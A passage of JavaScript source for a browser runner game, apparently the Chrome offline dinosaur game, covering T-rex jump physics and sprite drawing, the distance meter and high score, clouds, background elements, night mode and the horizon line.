Trex.config.GRAVITY = spriteDefinition.GRAVITY || Trex.config.GRAVITY;
Trex.config.HEIGHT = spriteDefinition.RUNNING_1.h,
Trex.config.INITIAL_JUMP_VELOCITY = spriteDefinition.INITIAL_JUMP_VELOCITY;
Trex.config.MAX_JUMP_HEIGHT = spriteDefinition.MAX_JUMP_HEIGHT;
Trex.config.MIN_JUMP_HEIGHT = spriteDefinition.MIN_JUMP_HEIGHT;
Trex.config.WIDTH = spriteDefinition.RUNNING_1.w;
Trex.config.WIDTH_JUMP = spriteDefinition.JUMPING.w;
Trex.config.INVERT_JUMP = spriteDefinition.INVERT_JUMP;
this.adjustAltGameConfigForSlowSpeed(spriteDefinition.GRAVITY);
this.config = Trex.config;
// Adjust bottom horizon placement.
this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
Runner.spriteDefinition['BOTTOM_PAD'];
this.yPos = this.groundYPos;
this.reset();
},
/**
* Slow speeds adjustments for the alt game modes.
* @param {number=} opt_gravityValue
*/
adjustAltGameConfigForSlowSpeed: function(opt_gravityValue) {
if (Runner.slowDown) {
if (opt_gravityValue) {
Trex.config.GRAVITY = opt_gravityValue / 1.5;
}
Trex.config.MIN_JUMP_HEIGHT *= 1.5;
Trex.config.MAX_JUMP_HEIGHT *= 1.5;
Trex.config.INITIAL_JUMP_VELOCITY =
Trex.config.INITIAL_JUMP_VELOCITY * 1.5;
}
},
/**
* Setter whether dino is flashing.
* @param {boolean} status
*/
setFlashing: function(status) {
this.flashing = status;
},
/**
* Setter for the jump velocity.
* The approriate drop velocity is also set.
* @param {number} setting
*/
setJumpVelocity(setting) {
this.config.INITIAL_JUMP_VELOCITY = -setting;
this.config.DROP_VELOCITY = -setting / 2;
},
/**
* Set the animation status.
* @param {!number} deltaTime
* @param {Trex.status=} opt_status Optional status to switch to.
*/
update(deltaTime, opt_status) {
this.timer += deltaTime;
// Update the status.
if (opt_status) {
this.status = opt_status;
this.currentFrame = 0;
this.msPerFrame = Trex.animFrames[opt_status].msPerFrame;
this.currentAnimFrames = Trex.animFrames[opt_status].frames;
if (opt_status === Trex.status.WAITING) {
this.animStartTime = getTimeStamp();
this.setBlinkDelay();
}
}
// Game intro animation, T-rex moves in from the left.
if (this.playingIntro && this.xPos < this.config.START_X_POS) {
this.xPos += Math.round((this.config.START_X_POS /
this.config.INTRO_DURATION) * deltaTime);
this.xInitialPos = this.xPos;
}
if (this.status === Trex.status.WAITING) {
this.blink(getTimeStamp());
} else {
this.draw(this.currentAnimFrames[this.currentFrame], 0);
}
// Update the frame position.
if (!this.flashing && this.timer >= this.msPerFrame) {
this.currentFrame = this.currentFrame ==
this.currentAnimFrames.length - 1 ? 0 : this.currentFrame + 1;
this.timer = 0;
}
if (!this.altGameModeEnabled) {
// Speed drop becomes duck if the down key is still being pressed.
if (this.speedDrop && this.yPos === this.groundYPos) {
this.speedDrop = false;
this.setDuck(true);
}
}
},
/**
* Draw the t-rex to a particular position.
* @param {number} x
* @param {number} y
*/
draw(x, y) {
let sourceX = x;
let sourceY = y;
let sourceWidth = this.ducking && this.status !== Trex.status.CRASHED ?
this.config.WIDTH_DUCK :
this.config.WIDTH;
let sourceHeight = this.config.HEIGHT;
const outputHeight = sourceHeight;
let jumpOffset = Runner.spriteDefinition.TREX.JUMPING.xOffset;
// Width of sprite changes on jump.
if (this.altGameModeEnabled && this.jumping &&
this.status !== Trex.status.CRASHED) {
sourceWidth = this.config.WIDTH_JUMP;
}
if (IS_HIDPI) {
sourceX *= 2;
sourceY *= 2;
sourceWidth *= 2;
sourceHeight *= 2;
jumpOffset *= 2;
}
// Adjustments for sprite sheet position.
sourceX += this.spritePos.x;
sourceY += this.spritePos.y;
// Flashing.
if (this.flashing) {
if (this.timer < this.config.FLASH_ON) {
this.canvasCtx.globalAlpha = 0.5;
} else if (this.timer > this.config.FLASH_OFF) {
this.timer = 0;
}
}
// Ducking.
if (!this.altGameModeEnabled && this.ducking &&
this.status !== Trex.status.CRASHED) {
this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
sourceWidth, sourceHeight,
this.xPos, this.yPos,
this.config.WIDTH_DUCK, outputHeight);
} else if (
this.altGameModeEnabled && this.jumping &&
this.status !== Trex.status.CRASHED) {
// Jumping with adjustments.
this.canvasCtx.drawImage(
Runner.imageSprite, sourceX, sourceY, sourceWidth, sourceHeight,
this.xPos - jumpOffset, this.yPos, this.config.WIDTH_JUMP,
outputHeight);
} else {
// Crashed whilst ducking. Trex is standing up so needs adjustment.
if (this.ducking && this.status === Trex.status.CRASHED) {
this.xPos++;
}
// Standing / running
this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
sourceWidth, sourceHeight,
this.xPos, this.yPos,
this.config.WIDTH, outputHeight);
}
this.canvasCtx.globalAlpha = 1;
},
/**
* Sets a random time for the blink to happen.
*/
setBlinkDelay() {
this.blinkDelay = Math.ceil(Math.random() * Trex.BLINK_TIMING);
},
/**
* Make t-rex blink at random intervals.
* @param {number} time Current time in milliseconds.
*/
blink(time) {
const deltaTime = time - this.animStartTime;
if (deltaTime >= this.blinkDelay) {
this.draw(this.currentAnimFrames[this.currentFrame], 0);
if (this.currentFrame === 1) {
// Set new random delay to blink.
this.setBlinkDelay();
this.animStartTime = time;
this.blinkCount++;
}
}
},
/**
* Initialise a jump.
* @param {number} speed
*/
startJump(speed) {
if (!this.jumping) {
this.update(0, Trex.status.JUMPING);
// Tweak the jump velocity based on the speed.
this.jumpVelocity = this.config.INITIAL_JUMP_VELOCITY - (speed / 10);
this.jumping = true;
this.reachedMinHeight = false;
this.speedDrop = false;
if (this.config.INVERT_JUMP) {
this.minJumpHeight = this.groundYPos + this.config.MIN_JUMP_HEIGHT;
}
}
},
/**
* Jump is complete, falling down.
*/
endJump() {
if (this.reachedMinHeight &&
this.jumpVelocity < this.config.DROP_VELOCITY) {
this.jumpVelocity = this.config.DROP_VELOCITY;
}
},
/**
* Update frame for a jump.
* @param {number} deltaTime
*/
updateJump(deltaTime) {
const msPerFrame = Trex.animFrames[this.status].msPerFrame;
const framesElapsed = deltaTime / msPerFrame;
// Speed drop makes Trex fall faster.
if (this.speedDrop) {
this.yPos += Math.round(this.jumpVelocity *
this.config.SPEED_DROP_COEFFICIENT * framesElapsed);
} else if (this.config.INVERT_JUMP) {
this.yPos -= Math.round(this.jumpVelocity * framesElapsed);
} else {
this.yPos += Math.round(this.jumpVelocity * framesElapsed);
}
this.jumpVelocity += this.config.GRAVITY * framesElapsed;
// Minimum height has been reached.
if (this.config.INVERT_JUMP && (this.yPos > this.minJumpHeight) ||
!this.config.INVERT_JUMP && (this.yPos < this.minJumpHeight) ||
this.speedDrop) {
this.reachedMinHeight = true;
}
// Reached max height.
if (this.config.INVERT_JUMP && (this.yPos > -this.config.MAX_JUMP_HEIGHT) ||
!this.config.INVERT_JUMP && (this.yPos < this.config.MAX_JUMP_HEIGHT) ||
this.speedDrop) {
this.endJump();
}
// Back down at ground level. Jump completed.
if ((this.config.INVERT_JUMP && this.yPos) < this.groundYPos ||
(!this.config.INVERT_JUMP && this.yPos) > this.groundYPos) {
this.reset();
this.jumpCount++;
if (Runner.audioCues) {
Runner.generatedSoundFx.loopFootSteps();
}
}
},
/**
* Set the speed drop. Immediately cancels the current jump.
*/
setSpeedDrop() {
this.speedDrop = true;
this.jumpVelocity = 1;
},
/**
* @param {boolean} isDucking
*/
setDuck(isDucking) {
if (isDucking && this.status !== Trex.status.DUCKING) {
this.update(0, Trex.status.DUCKING);
this.ducking = true;
} else if (this.status === Trex.status.DUCKING) {
this.update(0, Trex.status.RUNNING);
this.ducking = false;
}
},
/**
* Reset the t-rex to running at start of game.
*/
reset() {
this.xPos = this.xInitialPos;
this.yPos = this.groundYPos;
this.jumpVelocity = 0;
this.jumping = false;
this.ducking = false;
this.update(0, Trex.status.RUNNING);
this.midair = false;
this.speedDrop = false;
this.jumpCount = 0;
},
};
//******************************************************************************
/**
* Handles displaying the distance meter.
* @param {!HTMLCanvasElement} canvas
* @param {Object} spritePos Image position in sprite.
* @param {number} canvasWidth
* @constructor
*/
function DistanceMeter(canvas, spritePos, canvasWidth) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
this.image = Runner.imageSprite;
this.spritePos = spritePos;
this.x = 0;
this.y = 5;
this.currentDistance = 0;
this.maxScore = 0;
this.highScore = '0';
this.container = null;
this.digits = [];
this.achievement = false;
this.defaultString = '';
this.flashTimer = 0;
this.flashIterations = 0;
this.invertTrigger = false;
this.flashingRafId = null;
this.highScoreBounds = {};
this.highScoreFlashing = false;
this.config = DistanceMeter.config;
this.maxScoreUnits = this.config.MAX_DISTANCE_UNITS;
this.canvasWidth = canvasWidth;
this.init(canvasWidth);
}
/**
* @enum {number}
*/
DistanceMeter.dimensions = {
WIDTH: 10,
HEIGHT: 13,
DEST_WIDTH: 11,
};
/**
* Y positioning of the digits in the sprite sheet.
* X position is always 0.
* @type {Array<number>}
*/
DistanceMeter.yPos = [0, 13, 27, 40, 53, 67, 80, 93, 107, 120];
/**
* Distance meter config.
* @enum {number}
*/
DistanceMeter.config = {
// Number of digits.
MAX_DISTANCE_UNITS: 5,
// Distance that causes achievement animation.
ACHIEVEMENT_DISTANCE: 100,
// Used for conversion from pixel distance to a scaled unit.
COEFFICIENT: 0.025,
// Flash duration in milliseconds.
FLASH_DURATION: 1000 / 4,
// Flash iterations for achievement animation.
FLASH_ITERATIONS: 3,
// Padding around the high score hit area.
HIGH_SCORE_HIT_AREA_PADDING: 4,
};
DistanceMeter.prototype = {
/**
* Initialise the distance meter to '00000'.
* @param {number} width Canvas width in px.
*/
init(width) {
let maxDistanceStr = '';
this.calcXPos(width);
this.maxScore = this.maxScoreUnits;
for (let i = 0; i < this.maxScoreUnits; i++) {
this.draw(i, 0);
this.defaultString += '0';
maxDistanceStr += '9';
}
this.maxScore = parseInt(maxDistanceStr, 10);
},
/**
* Calculate the xPos in the canvas.
* @param {number} canvasWidth
*/
calcXPos(canvasWidth) {
this.x = canvasWidth - (DistanceMeter.dimensions.DEST_WIDTH *
(this.maxScoreUnits + 1));
},
/**
* Draw a digit to canvas.
* @param {number} digitPos Position of the digit.
* @param {number} value Digit value 0-9.
* @param {boolean=} opt_highScore Whether drawing the high score.
*/
draw(digitPos, value, opt_highScore) {
let sourceWidth = DistanceMeter.dimensions.WIDTH;
let sourceHeight = DistanceMeter.dimensions.HEIGHT;
let sourceX = DistanceMeter.dimensions.WIDTH * value;
let sourceY = 0;
const targetX = digitPos * DistanceMeter.dimensions.DEST_WIDTH;
const targetY = this.y;
const targetWidth = DistanceMeter.dimensions.WIDTH;
const targetHeight = DistanceMeter.dimensions.HEIGHT;
// For high DPI we 2x source values.
if (IS_HIDPI) {
sourceWidth *= 2;
sourceHeight *= 2;
sourceX *= 2;
}
sourceX += this.spritePos.x;
sourceY += this.spritePos.y;
this.canvasCtx.save();
if (IS_RTL) {
if (opt_highScore) {
this.canvasCtx.translate(
this.canvasWidth -
(DistanceMeter.dimensions.WIDTH * (this.maxScoreUnits + 3)),
this.y);
} else {
this.canvasCtx.translate(
this.canvasWidth - DistanceMeter.dimensions.WIDTH, this.y);
}
this.canvasCtx.scale(-1, 1);
} else {
const highScoreX =
this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH;
if (opt_highScore) {
this.canvasCtx.translate(highScoreX, this.y);
} else {
this.canvasCtx.translate(this.x, this.y);
}
}
this.canvasCtx.drawImage(
this.image,
sourceX,
sourceY,
sourceWidth,
sourceHeight,
targetX,
targetY,
targetWidth,
targetHeight,
);
this.canvasCtx.restore();
},
/**
* Covert pixel distance to a 'real' distance.
* @param {number} distance Pixel distance ran.
* @return {number} The 'real' distance ran.
*/
getActualDistance(distance) {
return distance ? Math.round(distance * this.config.COEFFICIENT) : 0;
},
/**
* Update the distance meter.
* @param {number} distance
* @param {number} deltaTime
* @return {boolean} Whether the acheivement sound fx should be played.
*/
update(deltaTime, distance) {
let paint = true;
let playSound = false;
if (!this.achievement) {
distance = this.getActualDistance(distance);
// Score has gone beyond the initial digit count.
if (distance > this.maxScore && this.maxScoreUnits ==
this.config.MAX_DISTANCE_UNITS) {
this.maxScoreUnits++;
this.maxScore = parseInt(this.maxScore + '9', 10);
} else {
this.distance = 0;
}
if (distance > 0) {
// Achievement unlocked.
if (distance % this.config.ACHIEVEMENT_DISTANCE === 0) {
// Flash score and play sound.
this.achievement = true;
this.flashTimer = 0;
playSound = true;
}
// Create a string representation of the distance with leading 0.
const distanceStr = (this.defaultString +
distance).substr(-this.maxScoreUnits);
this.digits = distanceStr.split('');
} else {
this.digits = this.defaultString.split('');
}
} else {
// Control flashing of the score on reaching acheivement.
if (this.flashIterations <= this.config.FLASH_ITERATIONS) {
this.flashTimer += deltaTime;
if (this.flashTimer < this.config.FLASH_DURATION) {
paint = false;
} else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
this.flashTimer = 0;
this.flashIterations++;
}
} else {
this.achievement = false;
this.flashIterations = 0;
this.flashTimer = 0;
}
}
// Draw the digits if not flashing.
if (paint) {
for (let i = this.digits.length - 1; i >= 0; i--) {
this.draw(i, parseInt(this.digits[i], 10));
}
}
this.drawHighScore();
return playSound;
},
/**
* Draw the high score.
*/
drawHighScore() {
if (parseInt(this.highScore, 10) > 0) {
this.canvasCtx.save();
this.canvasCtx.globalAlpha = .8;
for (let i = this.highScore.length - 1; i >= 0; i--) {
this.draw(i, parseInt(this.highScore[i], 10), true);
}
this.canvasCtx.restore();
}
},
/**
* Set the highscore as a array string.
* Position of char in the sprite: H - 10, I - 11.
* @param {number} distance Distance ran in pixels.
*/
setHighScore(distance) {
distance = this.getActualDistance(distance);
const highScoreStr = (this.defaultString +
distance).substr(-this.maxScoreUnits);
this.highScore = ['10', '11', ''].concat(highScoreStr.split(''));
},
/**
* Whether a clicked is in the high score area.
* @param {Event} e Event object.
* @return {boolean} Whether the click was in the high score bounds.
*/
hasClickedOnHighScore(e) {
let x = 0;
let y = 0;
if (e.touches) {
// Bounds for touch differ from pointer.
const canvasBounds = this.canvas.getBoundingClientRect();
x = e.touches[0].clientX - canvasBounds.left;
y = e.touches[0].clientY - canvasBounds.top;
} else {
x = e.offsetX;
y = e.offsetY;
}
this.highScoreBounds = this.getHighScoreBounds();
return x >= this.highScoreBounds.x && x <=
this.highScoreBounds.x + this.highScoreBounds.width &&
y >= this.highScoreBounds.y && y <=
this.highScoreBounds.y + this.highScoreBounds.height;
},
/**
* Get the bounding box for the high score.
* @return {Object} Object with x, y, width and height properties.
*/
getHighScoreBounds() {
return {
x: (this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH) -
DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
y: this.y,
width: DistanceMeter.dimensions.WIDTH * (this.highScore.length + 1) +
DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
height: DistanceMeter.dimensions.HEIGHT +
(DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING * 2),
};
},
/**
* Animate flashing the high score to indicate ready for resetting.
* The flashing stops following this.config.FLASH_ITERATIONS x 2 flashes.
*/
flashHighScore() {
const now = getTimeStamp();
const deltaTime = now - (this.frameTimeStamp || now);
let paint = true;
this.frameTimeStamp = now;
// Reached the max number of flashes.
if (this.flashIterations > this.config.FLASH_ITERATIONS * 2) {
this.cancelHighScoreFlashing();
return;
}
this.flashTimer += deltaTime;
if (this.flashTimer < this.config.FLASH_DURATION) {
paint = false;
} else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
this.flashTimer = 0;
this.flashIterations++;
}
if (paint) {
this.drawHighScore();
} else {
this.clearHighScoreBounds();
}
// Frame update.
this.flashingRafId =
requestAnimationFrame(this.flashHighScore.bind(this));
},
/**
* Draw empty rectangle over high score.
*/
clearHighScoreBounds() {
this.canvasCtx.save();
this.canvasCtx.fillStyle = '#fff';
this.canvasCtx.rect(this.highScoreBounds.x, this.highScoreBounds.y,
this.highScoreBounds.width, this.highScoreBounds.height);
this.canvasCtx.fill();
this.canvasCtx.restore();
},
/**
* Starts the flashing of the high score.
*/
startHighScoreFlashing() {
this.highScoreFlashing = true;
this.flashHighScore();
},
/**
* Whether high score is flashing.
* @return {boolean}
*/
isHighScoreFlashing() {
return this.highScoreFlashing;
},
/**
* Stop flashing the high score.
*/
cancelHighScoreFlashing() {
if (this.flashingRafId) {
cancelAnimationFrame(this.flashingRafId);
}
this.flashIterations = 0;
this.flashTimer = 0;
this.highScoreFlashing = false;
this.clearHighScoreBounds();
this.drawHighScore();
},
/**
* Clear the high score.
*/
resetHighScore() {
this.setHighScore(0);
this.cancelHighScoreFlashing();
},
/**
* Reset the distance meter back to '00000'.
*/
reset() {
this.update(0, 0);
this.achievement = false;
},
};
//******************************************************************************
/**
* Cloud background item.
* Similar to an obstacle object but without collision boxes.
* @param {HTMLCanvasElement} canvas Canvas element.
* @param {Object} spritePos Position of image in sprite.
* @param {number} containerWidth
* @constructor
*/
function Cloud(canvas, spritePos, containerWidth) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
this.spritePos = spritePos;
this.containerWidth = containerWidth;
this.xPos = containerWidth;
this.yPos = 0;
this.remove = false;
this.gap =
getRandomNum(Cloud.config.MIN_CLOUD_GAP, Cloud.config.MAX_CLOUD_GAP);
this.init();
}
/**
* Cloud object config.
* @enum {number}
*/
Cloud.config = {
HEIGHT: 14,
MAX_CLOUD_GAP: 400,
MAX_SKY_LEVEL: 30,
MIN_CLOUD_GAP: 100,
MIN_SKY_LEVEL: 71,
WIDTH: 46,
};
Cloud.prototype = {
/**
* Initialise the cloud. Sets the Cloud height.
*/
init() {
this.yPos = getRandomNum(Cloud.config.MAX_SKY_LEVEL,
Cloud.config.MIN_SKY_LEVEL);
this.draw();
},
/**
* Draw the cloud.
*/
draw() {
this.canvasCtx.save();
let sourceWidth = Cloud.config.WIDTH;
let sourceHeight = Cloud.config.HEIGHT;
const outputWidth = sourceWidth;
const outputHeight = sourceHeight;
if (IS_HIDPI) {
sourceWidth = sourceWidth * 2;
sourceHeight = sourceHeight * 2;
}
this.canvasCtx.drawImage(Runner.imageSprite, this.spritePos.x,
this.spritePos.y,
sourceWidth, sourceHeight,
this.xPos, this.yPos,
outputWidth, outputHeight);
this.canvasCtx.restore();
},
/**
* Update the cloud position.
* @param {number} speed
*/
update(speed) {
if (!this.remove) {
this.xPos -= Math.ceil(speed);
this.draw();
// Mark as removeable if no longer in the canvas.
if (!this.isVisible()) {
this.remove = true;
}
}
},
/**
* Check if the cloud is visible on the stage.
* @return {boolean}
*/
isVisible() {
return this.xPos + Cloud.config.WIDTH > 0;
},
};
/**
* Background item.
* Similar to cloud, without random y position.
* @param {HTMLCanvasElement} canvas Canvas element.
* @param {Object} spritePos Position of image in sprite.
* @param {number} containerWidth
* @param {string} type Element type.
* @constructor
*/
function BackgroundEl(canvas, spritePos, containerWidth, type) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
this.spritePos = spritePos;
this.containerWidth = containerWidth;
this.xPos = containerWidth;
this.yPos = 0;
this.remove = false;
this.type = type;
this.gap =
getRandomNum(BackgroundEl.config.MIN_GAP, BackgroundEl.config.MAX_GAP);
this.animTimer = 0;
this.switchFrames = false;
this.spriteConfig = {};
this.init();
}
/**
* Background element object config.
* Real values assigned when game type changes.
* @enum {number}
*/
BackgroundEl.config = {
MAX_BG_ELS: 0,
MAX_GAP: 0,
MIN_GAP: 0,
POS: 0,
SPEED: 0,
Y_POS: 0,
MS_PER_FRAME: 0, // only needed when BACKGROUND_EL.FIXED is true
};
BackgroundEl.prototype = {
/**
* Initialise the element setting the y position.
*/
init() {
this.spriteConfig = Runner.spriteDefinition.BACKGROUND_EL[this.type];
if (this.spriteConfig.FIXED) {
this.xPos = this.spriteConfig.FIXED_X_POS;
}
this.yPos = BackgroundEl.config.Y_POS - this.spriteConfig.HEIGHT +
this.spriteConfig.OFFSET;
this.draw();
},
/**
* Draw the element.
*/
draw() {
this.canvasCtx.save();
let sourceWidth = this.spriteConfig.WIDTH;
let sourceHeight = this.spriteConfig.HEIGHT;
let sourceX = this.spriteConfig.X_POS;
const outputWidth = sourceWidth;
const outputHeight = sourceHeight;
if (IS_HIDPI) {
sourceWidth *= 2;
sourceHeight *= 2;
sourceX *= 2;
}
this.canvasCtx.drawImage(
Runner.imageSprite, sourceX, this.spritePos.y, sourceWidth,
sourceHeight, this.xPos, this.yPos, outputWidth, outputHeight);
this.canvasCtx.restore();
},
/**
* Update the background element position.
* @param {number} speed
*/
update(speed) {
if (!this.remove) {
if (this.spriteConfig.FIXED) {
this.animTimer += speed;
if (this.animTimer > BackgroundEl.config.MS_PER_FRAME) {
this.animTimer = 0;
this.switchFrames = !this.switchFrames;
}
if (this.spriteConfig.FIXED_Y_POS_1 &&
this.spriteConfig.FIXED_Y_POS_2) {
this.yPos = this.switchFrames ? this.spriteConfig.FIXED_Y_POS_1 :
this.spriteConfig.FIXED_Y_POS_2;
}
} else {
// Fixed speed, regardless of actual game speed.
this.xPos -= BackgroundEl.config.SPEED;
}
this.draw();
// Mark as removable if no longer in the canvas.
if (!this.isVisible()) {
this.remove = true;
}
}
},
/**
* Check if the element is visible on the stage.
* @return {boolean}
*/
isVisible() {
return this.xPos + this.spriteConfig.WIDTH > 0;
},
};
//******************************************************************************
/**
* Nightmode shows a moon and stars on the horizon.
* @param {HTMLCanvasElement} canvas
* @param {number} spritePos
* @param {number} containerWidth
* @constructor
*/
function NightMode(canvas, spritePos, containerWidth) {
this.spritePos = spritePos;
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
this.xPos = containerWidth - 50;
this.yPos = 30;
this.currentPhase = 0;
this.opacity = 0;
this.containerWidth = containerWidth;
this.stars = [];
this.drawStars = false;
this.placeStars();
}
/**
* @enum {number}
*/
NightMode.config = {
FADE_SPEED: 0.035,
HEIGHT: 40,
MOON_SPEED: 0.25,
NUM_STARS: 2,
STAR_SIZE: 9,
STAR_SPEED: 0.3,
STAR_MAX_Y: 70,
WIDTH: 20,
};
NightMode.phases = [140, 120, 100, 60, 40, 20, 0];
NightMode.prototype = {
/**
* Update moving moon, changing phases.
* @param {boolean} activated Whether night mode is activated.
*/
update(activated) {
// Moon phase.
if (activated && this.opacity === 0) {
this.currentPhase++;
if (this.currentPhase >= NightMode.phases.length) {
this.currentPhase = 0;
}
}
// Fade in / out.
if (activated && (this.opacity < 1 || this.opacity === 0)) {
this.opacity += NightMode.config.FADE_SPEED;
} else if (this.opacity > 0) {
this.opacity -= NightMode.config.FADE_SPEED;
}
// Set moon positioning.
if (this.opacity > 0) {
this.xPos = this.updateXPos(this.xPos, NightMode.config.MOON_SPEED);
// Update stars.
if (this.drawStars) {
for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
this.stars[i].x =
this.updateXPos(this.stars[i].x, NightMode.config.STAR_SPEED);
}
}
this.draw();
} else {
this.opacity = 0;
this.placeStars();
}
this.drawStars = true;
},
updateXPos(currentPos, speed) {
if (currentPos < -NightMode.config.WIDTH) {
currentPos = this.containerWidth;
} else {
currentPos -= speed;
}
return currentPos;
},
draw() {
let moonSourceWidth = this.currentPhase === 3 ? NightMode.config.WIDTH * 2 :
NightMode.config.WIDTH;
let moonSourceHeight = NightMode.config.HEIGHT;
let moonSourceX = this.spritePos.x + NightMode.phases[this.currentPhase];
const moonOutputWidth = moonSourceWidth;
let starSize = NightMode.config.STAR_SIZE;
let starSourceX = Runner.spriteDefinitionByType.original.LDPI.STAR.x;
if (IS_HIDPI) {
moonSourceWidth *= 2;
moonSourceHeight *= 2;
moonSourceX = this.spritePos.x +
(NightMode.phases[this.currentPhase] * 2);
starSize *= 2;
starSourceX = Runner.spriteDefinitionByType.original.HDPI.STAR.x;
}
this.canvasCtx.save();
this.canvasCtx.globalAlpha = this.opacity;
// Stars.
if (this.drawStars) {
for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
this.canvasCtx.drawImage(
Runner.origImageSprite, starSourceX, this.stars[i].sourceY,
starSize, starSize, Math.round(this.stars[i].x), this.stars[i].y,
NightMode.config.STAR_SIZE, NightMode.config.STAR_SIZE);
}
}
// Moon.
this.canvasCtx.drawImage(
Runner.origImageSprite, moonSourceX, this.spritePos.y, moonSourceWidth,
moonSourceHeight, Math.round(this.xPos), this.yPos, moonOutputWidth,
NightMode.config.HEIGHT);
this.canvasCtx.globalAlpha = 1;
this.canvasCtx.restore();
},
// Do star placement.
placeStars() {
const segmentSize = Math.round(this.containerWidth /
NightMode.config.NUM_STARS);
for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
this.stars[i] = {};
this.stars[i].x = getRandomNum(segmentSize * i, segmentSize * (i + 1));
this.stars[i].y = getRandomNum(0, NightMode.config.STAR_MAX_Y);
if (IS_HIDPI) {
this.stars[i].sourceY =
Runner.spriteDefinitionByType.original.HDPI.STAR.y +
NightMode.config.STAR_SIZE * 2 * i;
} else {
this.stars[i].sourceY =
Runner.spriteDefinitionByType.original.LDPI.STAR.y +
NightMode.config.STAR_SIZE * i;
}
}
},
reset() {
this.currentPhase = 0;
this.opacity = 0;
this.update(false);
},
};
//******************************************************************************
/**
* Horizon Line.
* Consists of two connecting lines. Randomly assigns a flat / bumpy horizon.
* @param {HTMLCanvasElement} canvas
* @param {Object} lineConfig Configuration object.
* @constructor
*/
function HorizonLine(canvas, lineConfig) {
let sourceX = lineConfig.SOURCE_X;
let sourceY = lineConfig.SOURCE_Y;
if (IS_HIDPI) {
sourceX *= 2;
sourceY *= 2;
}
this.spritePos = {x: sourceX, y: sourceY};
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
this.sourceDimensions = {};
this.dimensions = lineConfig;
this.sourceXPos = [this.spritePos.x, this.spritePos.x +
this.dimensions.WIDTH];
this.xPos = [];
this.yPos = 0;
this.bumpThreshold = 0.5;
this.setSourceDimensions(lineConfig);
this.draw();
}
/**
* Horizon line dimensions.
* @enum {number}
*/
HorizonLine.dimensions = {
WIDTH: 600,
HEIGHT: 12,
YPOS: 127,
};
HorizonLine.prototype = {
/**
* Set the source dimensions of the horizon line.
*/
setSourceDimensions(newDimensions) {
for (const dimension in newDimensions) {
if (dimension !== 'SOURCE_X' && dimension !== 'SOURCE_Y') {
if (IS_HIDPI) {
if (dimension !== 'YPOS') {
this.sourceDimensions[dimension] = newDimensions[dimension] * 2;
}
} else {
this.sourceDimensions[dimension] = newDimensions[dimension];
}
this.dimensions[dimension] = newDimensions[dimension];
}
}
this.xPos = [0, newDimensions.WIDTH];
this.yPos = newDimensions.YPOS;
},
/**
* Return the crop x position of a type.
*/
getRandomType() {
return Math.random() > this.bumpThreshold ? this.dimensions.WIDTH : 0;
},
/**
* Draw the horizon line.
*/
draw() {
this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[0],
this.spritePos.y,
this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
this.xPos[0], this.yPos,
this.dimensions.WIDTH, this.dimensions.HEIGHT);
this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[1],
this.spritePos.y,
this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
this.xPos[1], this.yPos,
this.dimensions.WIDTH, this.dimensions.HEIGHT);
},
/**
* Update the x position of an indivdual piece of the line.
* @param {number} pos Line position.
* @param {number} increment
*/
updateXPos(pos, increment) {
const line1 = pos;
const line2 = pos === 0 ? 1 : 0;
this.xPos[line1] -= increment;
this.xPos[line2] = this.xPos[line1] + this.dimensions.WIDTH;
if (this.xPos[line1] <= -this.dimensions.WIDTH) {
this.xPos[line1] += this.dimensions.WIDTH * 2;
this.xPos[line2] = this.xPos[line1] - this.dimensions.WIDTH;
this.sourceXPos[line1] = this.getRandomType() + this.spritePos.x;
}
},
/**
* Update the horizon line.
* @param {number} deltaTime
* @param {number} speed
*/
update(deltaTime, speed) {
const increment = Math.floor(speed * (FPS / 1000) * deltaTime);
if (this.xPos[0] <= 0) {
this.updateXPos(0, increment);
} else {
this.updateXPos(1, increment);
}
this.draw();
},
/**
* Reset horizon to the starting position.
*/
reset() {
this.xPos[0] = 0;
this.xPos[1] = this.dimensions.WIDTH;
},
};
//******************************************************************************
/**
* Horizon background class.
* @param {HTMLCanvasElement} canvas
* @param {Object} spritePos Sprite positioning.
* @param {Object} dimensions Canvas dimensions.
* @param {number} gapCoefficient
* @constructor
*/
function Horizon(canvas, spritePos, dimensions, gapCoefficient) {
this.canvas = canvas;
this.canvasCtx =
/** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
this.config = Horizon.config;
this.dimensions = dimensions;
this.gapCoefficient = gapCoefficient;
this.obstacles = [];
this.obstacleHistory = [];
this.horizonOffsets = [0, 0];
this.cloudFrequency = this.config.CLOUD_FREQUENCY;
this.spritePos = spritePos;
this.nightMode = null;
this.altGameModeActive = false;
// Cloud
this.clouds = [];
this.cloudSpeed = this.config.BG_CLOUD_SPEED;
// Background elements
this.backgroundEls = [];
this.lastEl = null;
this.backgroundSpeed = this.config.BG_CLOUD_SPEED;
// Horizon
this.horizonLine = null;
this.horizonLines = [];
this.init();
}
/**
* Horizon config.
* @enum {number}
*/
Horizon.config = {
BG_CLOUD_SPEED: 0.2,
BUMPY_THRESHOLD: .3,
CLOUD_FREQUENCY: .5,
HORIZON_HEIGHT: 16,
MAX_CLOUDS: 6,
};
Horizon.prototype = {
/**
* Initialise the horizon. Just add the line and a cloud. No obstacles.
*/
init() {
